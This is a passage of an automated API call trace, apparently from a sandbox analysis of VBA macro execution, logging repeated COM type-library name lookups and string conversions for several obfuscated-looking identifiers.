ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="boAABZDG") returned 0x103e27 [0069.858] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="boAABZDG" | out: _Dst="boAABZDG") returned 0x0 [0069.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="boAABZDG") returned 9 [0069.858] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.858] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="boAABZDG", lHashVal=0x103e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.858] IUnknown:Release (This=0x665ba50) returned 0xd [0069.858] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.858] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="boAABZDG", lHashVal=0x103e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.858] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.858] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.858] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="boAABZDG", lHashVal=0x103e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.858] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.858] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.858] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="boAABZDG", lHashVal=0x103e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.858] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82532, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="boAABZDG") returned 9 [0069.858] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="boAABZDG", lHashVal=0x103e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.858] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.858] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82532 | out: _Dst=0x68767a0) returned 0x0 [0069.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_boAABZDG") returned 0x10062f [0069.858] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_boAABZDG" | out: _Dst="_B_var_boAABZDG") returned 0x0 [0069.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_boAABZDG") returned 16 [0069.859] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.859] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_boAABZDG", lHashVal=0x10062f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.859] IUnknown:Release (This=0x665ba50) returned 0xd [0069.859] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.859] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_boAABZDG", lHashVal=0x10062f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.859] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.859] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.859] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_boAABZDG", lHashVal=0x10062f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.859] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.859] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.859] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_boAABZDG", lHashVal=0x10062f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.859] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.859] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.859] IUnknown:Release (This=0x665ba50) returned 0xd [0069.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8719fe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_boAABZDG") returned 16 [0069.859] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_boAABZDG", lHashVal=0x10062f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0069.859] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82532 | out: _Dst=0x144ec0) returned 0x0 [0069.859] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aAkAcZ", lHashVal=0x100f7e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8255e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAkAcZ") returned 7 [0069.859] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aAkAcZ", lHashVal=0x100f7e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8255e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAkAcZ") returned 7 [0069.859] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aAkAcZ", lHashVal=0x100f7e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aAkAcZ") returned 0x100f7e [0069.860] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="aAkAcZ" | out: _Dst="aAkAcZ") returned 0x0 [0069.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="aAkAcZ") returned 7 [0069.860] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.860] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aAkAcZ", lHashVal=0x100f7e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.860] IUnknown:Release (This=0x665ba50) returned 0xd [0069.860] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.860] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aAkAcZ", lHashVal=0x100f7e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.860] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.860] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.860] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aAkAcZ", lHashVal=0x100f7e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.860] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.860] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.860] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aAkAcZ", lHashVal=0x100f7e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.860] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8255e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aAkAcZ") returned 7 [0069.860] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aAkAcZ", lHashVal=0x100f7e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.860] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.860] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b8255e | out: _Dst=0x68767a0) returned 0x0 [0069.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aAkAcZ") returned 0x108a27 [0069.860] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_aAkAcZ" | out: _Dst="_B_var_aAkAcZ") returned 0x0 [0069.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_aAkAcZ") returned 14 [0069.860] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.860] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aAkAcZ", lHashVal=0x108a27, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.860] IUnknown:Release (This=0x665ba50) returned 0xd [0069.860] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.860] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aAkAcZ", lHashVal=0x108a27, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.860] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.860] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.861] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aAkAcZ", lHashVal=0x108a27, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.861] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.861] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.861] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aAkAcZ", lHashVal=0x108a27, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.861] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.861] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.861] IUnknown:Release (This=0x665ba50) returned 0xd [0069.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871a2e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_aAkAcZ") returned 14 [0069.861] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aAkAcZ", lHashVal=0x108a27, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0) returned 0x0 [0069.861] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8255e | out: _Dst=0x144ec0) returned 0x0 [0069.861] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.861] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.861] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.861] IUnknown:Release (This=0x665ba50) returned 0xd [0069.861] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.861] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.861] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.861] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.861] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0069.861] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.862] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.862] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.862] IUnknown:Release (This=0x665ba50) returned 0xd [0069.862] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.862] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.862] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.862] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x68767a0 [0069.862] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.862] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.862] IUnknown:Release (This=0x665ba50) returned 0xd [0069.862] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.862] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.862] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.862] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.862] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0069.862] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.862] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.862] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.862] IUnknown:Release (This=0x665ba50) returned 0xd [0069.863] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.863] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.863] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.863] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x68767a0 [0069.863] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.863] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.863] IUnknown:Release (This=0x665ba50) returned 0xd [0069.863] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.863] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.863] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.863] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.863] IMalloc:Free (This=0x7fefec05380, pv=0x68767a0) [0069.863] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.863] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.863] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.863] IUnknown:Release (This=0x665ba50) returned 0xd [0069.863] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.863] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.863] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.863] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.864] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.864] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.864] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.864] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.864] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.864] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.864] IUnknown:Release (This=0x665ba50) returned 0xd [0069.864] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.864] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.864] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.864] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.864] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.864] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.864] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.864] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.864] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.864] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.864] IUnknown:Release (This=0x665ba50) returned 0xd [0069.864] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.865] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.865] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b824ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zX1A1D") returned 7 [0069.865] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zX1A1D", lHashVal=0x104c88, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.865] 